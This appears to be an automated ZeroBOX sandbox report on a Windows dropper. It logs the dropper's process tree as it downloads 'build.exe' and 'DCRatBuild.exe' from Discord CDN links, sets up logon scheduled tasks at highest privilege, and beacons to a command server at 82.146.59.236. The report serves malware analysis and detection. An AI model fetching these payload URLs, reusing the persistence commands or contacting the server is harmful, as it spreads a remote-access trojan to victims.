Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	May 18, 2021, 9:12 a.m.	May 18, 2021, 9:16 a.m.

Size	355.9KB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`3795c43b2e06e15edb01a8a237243b08`
SHA256	`5e959ac61844e15a0e83c9a4649e487a9e4d6188b4a1f3cd15303310d37cc32a`
CRC32	`14D41888`
ssdeep	`6144:3ldk1cWQRNTBe3Y/zLxYE68msRqQNwuloNN8vqwcaNbtaN+SP4+4:3cv0NTQo/zLplRhtoDz2Yxc`
Yara	PE_Header_Zero - PE File Signature IsPE32 - (no description)

file4.exe "C:\Users\test22\AppData\Local\Temp\file4.exe"
7180
- cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\FF19.tmp\FF1A.tmp\FF2B.bat C:\Users\test22\AppData\Local\Temp\file4.exe"
  4456
  - extd.exe C:\Users\test22\AppData\Local\Temp\FF19.tmp\FF1A.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""
    4636
  - extd.exe C:\Users\test22\AppData\Local\Temp\FF19.tmp\FF1A.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/841783192217452566/843779615813533706/build.exe" "build.exe" "" "" "" "" "" ""
    7960
  - extd.exe C:\Users\test22\AppData\Local\Temp\FF19.tmp\FF1A.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/841783192217452566/843559143889829908/DCRatBuild.exe" "DCRatBuild.exe" "" "" "" "" "" ""
    8948
  - build.exe build.exe
    4384
  - DCRatBuild.exe DCRatBuild.exe
    2120
    - wscript.exe "C:\Windows\System32\WScript.exe" "C:\Fontreviewdriversavesdhcp\SIvoA2AIk.vbe"
      7444
      - cmd.exe cmd /c ""C:\Fontreviewdriversavesdhcp\2UASzCE.bat" "
        6912
        
        FontreviewdriversavesdhcpperfDhcp.exe "C:\Fontreviewdriversavesdhcp\FontreviewdriversavesdhcpperfDhcp.exe"
        8140
        
        schtasks.exe "schtasks" /create /tn "KMService" /sc ONLOGON /tr "'C:\Windows\fveupdate\KMService.exe'" /rl HIGHEST /f
        9060
        
        schtasks.exe "schtasks" /create /tn "pw" /sc ONLOGON /tr "'C:\Documents and Settings\pw.exe'" /rl HIGHEST /f
        6400
        
        schtasks.exe "schtasks" /create /tn "smss" /sc ONLOGON /tr "'C:\Windows\System32\auditpol\smss.exe'" /rl HIGHEST /f
        7524
        
        schtasks.exe "schtasks" /create /tn "pw" /sc ONLOGON /tr "'C:\Python27\NEWS\pw.exe'" /rl HIGHEST /f
        3780
        
        cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Fontreviewdriversavesdhcp\lIP0ZiOi33.bat"
        2300
        
        chcp.com chcp 65001
        5116
        
        PING.EXE ping -n 5 localhost
        8908
        
        pw.exe "C:\Python27\NEWS\pw.exe"
        6788
  - extd.exe C:\Users\test22\AppData\Local\Temp\FF19.tmp\FF1A.tmp\extd.exe "" "" "" "" "" "" "" "" ""
    5960

Name	Response	Post-Analysis Lookup
api.faceit.com	A 104.17.63.50 A 104.17.62.50	104.17.63.50
ocsp.digicert.com	CNAME cs9.wac.phicdn.net A 117.18.237.29	117.18.237.29
ipinfo.io	A 34.117.59.81	34.117.59.81
cdn.discordapp.com	A 162.159.135.233 A 162.159.134.233 A 162.159.129.233 A 162.159.130.233 A 162.159.133.233	162.159.129.233

IP Address	Status	Action
104.17.62.50	Active	Moloch
117.18.237.29	Active	Moloch
162.159.129.233	Active	Moloch
164.124.101.2	Active	Moloch
172.217.25.14	Active	Moloch
34.117.59.81	Active	Moloch
82.146.59.236	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.102:49821 -> 104.17.62.50:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49823 -> 104.17.62.50:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49848 -> 34.117.59.81:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.102:49848 -> 34.117.59.81:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 34.117.59.81:443 -> 192.168.56.102:49848	2025330	ET POLICY Possible External IP Lookup SSL Cert Observed (ipinfo.io)	Device Retrieving External IP Address Detected

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLS 1.2 192.168.56.102:49817 162.159.129.233:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3	C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	54:e1:a7:9d:cc:c8:60:86:f1:a5:da:74:0e:5a:ab:45:df:37:8a:78
TLS 1.2 192.168.56.102:49812 162.159.129.233:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3	C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	54:e1:a7:9d:cc:c8:60:86:f1:a5:da:74:0e:5a:ab:45:df:37:8a:78
TLS 1.2 192.168.56.102:49848 34.117.59.81:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1D4	CN=ipinfo.io	43:26:3d:5a:7e:4a:bc:f7:21:b5:d0:00:f1:49:6c:a5:bf:d1:ff:e7

Queries for the computername (16 events)

Time & API	Arguments	Status	Return
GetComputerNameA May 18, 2021, 9:12 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 18, 2021, 9:05 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 18, 2021, 9:05 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 18, 2021, 9:05 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 18, 2021, 9:06 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 18, 2021, 9:06 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 18, 2021, 9:06 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 18, 2021, 9:06 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 18, 2021, 9:06 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 18, 2021, 9:06 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 18, 2021, 9:06 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 18, 2021, 9:06 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 18, 2021, 9:06 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 18, 2021, 9:07 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 18, 2021, 9:07 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 18, 2021, 9:07 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (8 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent May 18, 2021, 9:12 a.m.			0	0
IsDebuggerPresent May 18, 2021, 9:12 a.m.			0	0
IsDebuggerPresent May 18, 2021, 9:12 a.m.			0	0
IsDebuggerPresent May 18, 2021, 9:12 a.m.			0	0
IsDebuggerPresent May 18, 2021, 9:05 a.m.			0	0
IsDebuggerPresent May 18, 2021, 9:05 a.m.			0	0
IsDebuggerPresent May 18, 2021, 9:06 a.m.			0	0
IsDebuggerPresent May 18, 2021, 9:06 a.m.			0	0

Command line console output was observed (9 events)

Time & API	Arguments	Status	Return
WriteConsoleW May 18, 2021, 9:05 a.m.	buffer: sfasffasfasssssdds console_handle: 0x0000000000000007	1	1
WriteConsoleW May 18, 2021, 9:12 a.m.	buffer: C:\Fontreviewdriversavesdhcp> console_handle: 0x00000007	1	1
WriteConsoleW May 18, 2021, 9:12 a.m.	buffer: "C:\Fontreviewdriversavesdhcp\FontreviewdriversavesdhcpperfDhcp.exe" console_handle: 0x00000007	1	1
WriteConsoleW May 18, 2021, 9:06 a.m.	buffer: SUCCESS: The scheduled task "KMService" has successfully been created. console_handle: 0x0000000000000007	1	1
WriteConsoleW May 18, 2021, 9:06 a.m.	buffer: SUCCESS: The scheduled task "pw" has successfully been created. console_handle: 0x0000000000000007	1	1
WriteConsoleW May 18, 2021, 9:06 a.m.	buffer: SUCCESS: The scheduled task "smss" has successfully been created. console_handle: 0x0000000000000007	1	1
WriteConsoleW May 18, 2021, 9:06 a.m.	buffer: SUCCESS: The scheduled task "pw" has successfully been created. console_handle: 0x0000000000000007	1	1
WriteConsoleW May 18, 2021, 9:06 a.m.	buffer: The batch file cannot be found. console_handle: 0x000000000000000b	1	1
WriteConsoleW May 18, 2021, 9:06 a.m.	buffer: Active code page: 65001 console_handle: 0x0000000000000013	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx May 18, 2021, 9:05 a.m.		1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (1 event)

section

.code

The executable uses a known packer (1 event)

packer

PureBasic 4.x -> Neil Hodgson

One or more processes crashed (1 event)

Time & API	Arguments	Status	Return	Repeated
__exception__ May 18, 2021, 9:12 a.m.	stacktrace: build+0x7584 @ 0x407584 build+0x8ba1 @ 0x408ba1 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 8a 08 40 84 c9 75 f9 2b c2 50 ff 74 24 0c 8b ce exception.symbol: build+0x2dbb exception.instruction: mov cl, byte ptr [eax] exception.module: build.exe exception.exception_code: 0xc0000005 exception.offset: 11707 exception.address: 0x402dbb registers.esp: 1637020 registers.edi: 1 registers.eax: 0 registers.ebp: 1637160 registers.edx: 1 registers.ebx: 0 registers.esi: 4800604 registers.ecx: 4800604	1	0	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (5 events)

suspicious_features	Connection to IP address	suspicious_request	GET http://82.146.59.236/processorDefault.php?iu=mz7PKhpn3AIZq5efow1dQ6914SBfB&HK1Vy37nlY5quElyg=1XvN&46203bcc475d4509a3a86d65325f8855=d0f20e2b176e1456ae89e4aa36cdd07d&iu=mz7PKhpn3AIZq5efow1dQ6914SBfB&HK1Vy37nlY5quElyg=1XvN
suspicious_features	Connection to IP address	suspicious_request	GET http://82.146.59.236/processorDefault.php?iu=mz7PKhpn3AIZq5efow1dQ6914SBfB&HK1Vy37nlY5quElyg=1XvN&aabb8f74bac12735e9499cd9c6b8baf5=365da4edf7808b477a8d10cbf7405c61&f53d57fa5ca170272892cd3c6aa17be0=wY3AzM2ITM5YWNmljN3UDO4YDN5gjYjljMhZTO3M2YmZTOilTY2cjN&iu=mz7PKhpn3AIZq5efow1dQ6914SBfB&HK1Vy37nlY5quElyg=1XvN
suspicious_features	Connection to IP address	suspicious_request	GET http://82.146.59.236/processorDefault.php?iu=mz7PKhpn3AIZq5efow1dQ6914SBfB&HK1Vy37nlY5quElyg=1XvN&8132fb67618ecd9be106ef9ba3717022=QM5EjZxU2YjdTZykDNwQjN3YzN2IDNjlTZ0UzYwYWY2YmMlRDN0MGM5cjNwcTN2gjM0YTM4MzN&f53d57fa5ca170272892cd3c6aa17be0=ANxYmZ0ETN3QzNhZ2MzQWZkRjM2UGOzU2N5I2YyEDZmNjZ0YjZ1kDZ&095b88682a67bcf69516cfbd401a51e6=u4iL5J3b0NWZylGZgcmbp5mbhN2U&c5c532831db1a7dab19172319a0ff14a=ANwMjZlBDM0MGMhJTOkVzNjlDOkRDZiRWO0MzM0EDMjNWZwQDNzEjN&c6dd1cba03876c3affd0f11b003ca4a6=QNwQDN2U2YiZGO2gTNyImZ5ITY4ATNiBjZ3kzYlJTYxATYwIzMzIjZ
suspicious_features	GET method with no useragent header	suspicious_request	GET https://cdn.discordapp.com/attachments/841783192217452566/843779615813533706/build.exe
suspicious_features	GET method with no useragent header	suspicious_request	GET https://cdn.discordapp.com/attachments/841783192217452566/843559143889829908/DCRatBuild.exe

Performs some HTTP requests (16 events)

request	GET http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAo3h2ReX7SMIk79G%2B0UDDw%3D
request	GET http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAiIzVJfGSRETRSlgpHeuVI%3D
request	GET http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT3xL4LQLXDRDM9P665TW442vrsUQQUReuir%2FSSy4IxLVGLp6chnfNtyA8CEAQJGBtf1btmdVNDtW%2BVUAg%3D
request	GET http://crl.microsoft.com/pki/crl/products/MicrosoftTimeStampPCA.crl
request	GET http://crl.microsoft.com/pki/crl/products/microsoftrootcert.crl
request	GET http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSYagvY3tfizDNoybzVSPFZmSEm0wQUe2jOKarAF75JeuHlP9an90WPNTICEAUwi3asLhWylyD7Q5X2Xzg%3D
request	GET http://crl.microsoft.com/pki/crl/products/MicCodSigPCA_08-31-2010.crl
request	GET http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT3xL4LQLXDRDM9P665TW442vrsUQQUReuir%2FSSy4IxLVGLp6chnfNtyA8CEA%2BoSQYV1wCgviF2%2FcXsbb0%3D
request	GET http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSnR4FoxLLkI7vkvsUIFlZt%2BlGH3gQUWsS5eyoKo6XqcQPAYPkt9mV1DlgCEAM%2B1e2gZdG4yR38%2BSpsm9g%3D
request	GET http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAtqs7A%2Bsan2xGCSaqjN%2FrM%3D
request	GET http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEAx5qUSwjBGVIJJhX%2BJrHYM%3D
request	GET http://82.146.59.236/processorDefault.php?iu=mz7PKhpn3AIZq5efow1dQ6914SBfB&HK1Vy37nlY5quElyg=1XvN&46203bcc475d4509a3a86d65325f8855=d0f20e2b176e1456ae89e4aa36cdd07d&iu=mz7PKhpn3AIZq5efow1dQ6914SBfB&HK1Vy37nlY5quElyg=1XvN
request	GET http://82.146.59.236/processorDefault.php?iu=mz7PKhpn3AIZq5efow1dQ6914SBfB&HK1Vy37nlY5quElyg=1XvN&aabb8f74bac12735e9499cd9c6b8baf5=365da4edf7808b477a8d10cbf7405c61&f53d57fa5ca170272892cd3c6aa17be0=wY3AzM2ITM5YWNmljN3UDO4YDN5gjYjljMhZTO3M2YmZTOilTY2cjN&iu=mz7PKhpn3AIZq5efow1dQ6914SBfB&HK1Vy37nlY5quElyg=1XvN
request	GET http://82.146.59.236/processorDefault.php?iu=mz7PKhpn3AIZq5efow1dQ6914SBfB&HK1Vy37nlY5quElyg=1XvN&8132fb67618ecd9be106ef9ba3717022=QM5EjZxU2YjdTZykDNwQjN3YzN2IDNjlTZ0UzYwYWY2YmMlRDN0MGM5cjNwcTN2gjM0YTM4MzN&f53d57fa5ca170272892cd3c6aa17be0=ANxYmZ0ETN3QzNhZ2MzQWZkRjM2UGOzU2N5I2YyEDZmNjZ0YjZ1kDZ&095b88682a67bcf69516cfbd401a51e6=u4iL5J3b0NWZylGZgcmbp5mbhN2U&c5c532831db1a7dab19172319a0ff14a=ANwMjZlBDM0MGMhJTOkVzNjlDOkRDZiRWO0MzM0EDMjNWZwQDNzEjN&c6dd1cba03876c3affd0f11b003ca4a6=QNwQDN2U2YiZGO2gTNyImZ5ITY4ATNiBjZ3kzYlJTYxATYwIzMzIjZ
request	GET https://cdn.discordapp.com/attachments/841783192217452566/843779615813533706/build.exe
request	GET https://cdn.discordapp.com/attachments/841783192217452566/843559143889829908/DCRatBuild.exe

Allocates read-write-execute memory (usually to unpack itself) (50 out of 190 events)

Time & API	Arguments	Status
NtProtectVirtualMemory May 18, 2021, 9:12 a.m.	process_identifier: 4636 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73772000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 18, 2021, 9:12 a.m.	process_identifier: 7960 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73772000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 18, 2021, 9:12 a.m.	process_identifier: 8948 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73772000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 18, 2021, 9:12 a.m.	process_identifier: 2120 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73772000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 18, 2021, 9:12 a.m.	process_identifier: 5960 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73772000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 18, 2021, 9:12 a.m.	process_identifier: 7444 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73772000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2021, 9:05 a.m.	process_identifier: 8140 region_size: 1114112 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000006b0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory May 18, 2021, 9:05 a.m.	process_identifier: 8140 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000740000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory May 18, 2021, 9:05 a.m.	process_identifier: 8140 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2371000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory May 18, 2021, 9:05 a.m.	process_identifier: 8140 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2a0b000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory May 18, 2021, 9:05 a.m.	process_identifier: 8140 region_size: 1245184 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000001f70000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory May 18, 2021, 9:05 a.m.	process_identifier: 8140 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002020000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory May 18, 2021, 9:05 a.m.	process_identifier: 8140 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2372000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory May 18, 2021, 9:05 a.m.	process_identifier: 8140 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2372000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory May 18, 2021, 9:05 a.m.	process_identifier: 8140 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2372000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory May 18, 2021, 9:05 a.m.	process_identifier: 8140 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2372000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory May 18, 2021, 9:05 a.m.	process_identifier: 8140 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2372000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory May 18, 2021, 9:05 a.m.	process_identifier: 8140 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2372000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory May 18, 2021, 9:05 a.m.	process_identifier: 8140 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2372000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory May 18, 2021, 9:05 a.m.	process_identifier: 8140 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2372000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory May 18, 2021, 9:05 a.m.	process_identifier: 8140 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2372000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory May 18, 2021, 9:05 a.m.	process_identifier: 8140 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2372000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory May 18, 2021, 9:05 a.m.	process_identifier: 8140 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2372000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory May 18, 2021, 9:05 a.m.	process_identifier: 8140 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2374000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory May 18, 2021, 9:05 a.m.	process_identifier: 8140 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2374000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory May 18, 2021, 9:05 a.m.	process_identifier: 8140 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2374000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory May 18, 2021, 9:05 a.m.	process_identifier: 8140 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2374000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory May 18, 2021, 9:05 a.m.	process_identifier: 8140 region_size: 655360 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory May 18, 2021, 9:05 a.m.	process_identifier: 8140 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory May 18, 2021, 9:05 a.m.	process_identifier: 8140 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory May 18, 2021, 9:05 a.m.	process_identifier: 8140 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory May 18, 2021, 9:05 a.m.	process_identifier: 8140 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory May 18, 2021, 9:05 a.m.	process_identifier: 8140 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory May 18, 2021, 9:05 a.m.	process_identifier: 8140 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92bda000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory May 18, 2021, 9:05 a.m.	process_identifier: 8140 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92bec000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory May 18, 2021, 9:05 a.m.	process_identifier: 8140 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92d10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory May 18, 2021, 9:05 a.m.	process_identifier: 8140 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92c8c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory May 18, 2021, 9:05 a.m.	process_identifier: 8140 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92cb6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory May 18, 2021, 9:05 a.m.	process_identifier: 8140 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92c90000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory May 18, 2021, 9:05 a.m.	process_identifier: 8140 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92bdb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory May 18, 2021, 9:05 a.m.	process_identifier: 8140 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92bfb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory May 18, 2021, 9:05 a.m.	process_identifier: 8140 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92c2c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
